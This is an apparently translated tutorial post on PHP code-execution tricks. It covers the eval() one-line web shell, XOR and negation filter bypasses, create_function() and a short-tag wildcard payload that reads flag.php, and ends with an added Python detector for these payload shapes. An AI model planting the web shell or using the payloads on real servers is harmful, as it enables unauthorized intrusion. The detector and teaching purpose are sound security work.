
Code Execution Vulnerability - No-Alphanumeric RCE, create_function()

2022-07-04 02:52:00 qq_ fifty-one million five hundred and fifty thousand seven hun

Code Execution Vulnerability

eval() function

<?php eval($_POST[0]);?>

eval() treats the string it receives as PHP code and executes it (this is the classic one-line web shell).

AntSword can connect to this. The connection password is the value inside the brackets of $_POST[0], so here '0' is the connection password.

No alphanumeric RCE

RCE under harsh restrictions

Bitwise negation (NOT) and XOR are the ways to get around the filter.

Take the following example:
XOR method:
XOR.php

Run it from a terminal: php XOR.php
This uses a PHP 7 feature, dynamic function calls:
For system(ls), do it twice: once for system and once for ls.
Similarly:
Negation method:
qufan.php
In HackBar:

create_function()

create_function() takes two arguments, $args and $code, and is used to create a lambda-style function.

create_function() has been gradually phased out.

PS

When the filter restricts length, brackets and many other things, you can try:
?> closes the preceding PHP block.

<? is PHP's short open tag, and <?= stands for <? echo. For example, ![ Insert picture description here ](https://img-blog.csdnimg.cn/4e224060dc094c66974ed2f97fc8bdee.png) outputs abc.
Then look at the rest: a pair of backquotes is shell_exec, which executes a system command, and %20 is a space. The system command executed is equivalent to: /???/??? *
Here /???/??? is in fact /bin/cat, and the trailing * is flag.php.
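A defensive counterpart to the techniques above (negation and XOR expressions, the ?> closure, <?=, backquotes and /???/??? wildcards), added here as an example that is not part of the original post: a Python check that flags these shapes in URL-encoded request parameters. The function names and sample requests are constructed for illustration; the negation and XOR samples only have the shape of such input and do not decode to any function name.

```python
import re
from urllib.parse import unquote_to_bytes

# Shapes described on this page, matched on the URL-decoded parameter bytes.
ALNUM = re.compile(rb"[A-Za-z0-9]")
OPERATOR = re.compile(rb"[~^]")                # negation / XOR operators
CALL = re.compile(rb"\)\s*\(")                 # (expr)(args): dynamic function call
GLOB_PATH = re.compile(rb"(?:/[?*]{2,}){2,}")  # wildcard-only path such as /???/???
PHP_TAG = re.compile(rb"\?>|<\?=?")            # ?> closure, <? and <?= tags
BACKTICKS = re.compile(rb"`[^`]+`")            # backquotes behave like shell_exec


def findings(raw_value):
    """Return the reasons a raw (still URL-encoded) parameter value looks suspicious."""
    data = unquote_to_bytes(raw_value)
    hits = []
    # No ASCII letters or digits at all, yet it builds and calls an expression.
    if data and not ALNUM.search(data) and OPERATOR.search(data) and CALL.search(data):
        hits.append("alnum-free-dynamic-call")
    if GLOB_PATH.search(data):
        hits.append("wildcard-only-path")
    if PHP_TAG.search(data):
        hits.append("php-tag-in-parameter")
    if BACKTICKS.search(data):
        hits.append("backtick-execution")
    return hits


def scan_request(query):
    """Map parameter name -> findings, only for parameters with at least one finding."""
    report = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        hits = findings(value)
        if hits:
            report[name] = hits
    return report


# Constructed sample requests (not taken from real traffic).
SAMPLES = [
    "id=42&lang=en",
    "code=(~%A0%A1%A2)(~%A3%A4);",   # negation shape, meaningless bytes
    'code=("%01%02"^"%7E%7D")();',   # XOR shape, meaningless bytes
    "code=?><?=`/???/???%20*`?>",    # the short-tag / wildcard form from the PS section
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", scan_request(sample))
```

These are heuristics for log review or a WAF rule draft: "?>" can also appear in legitimate XML bodies, so treat a single hit as a lead. The underlying fix is still to keep request data out of eval() and create_function().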

Copyright notice
This article was written by [qq_ fifty-one million five hundred and fifty thousand seven hun]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/02/202202141805004812.html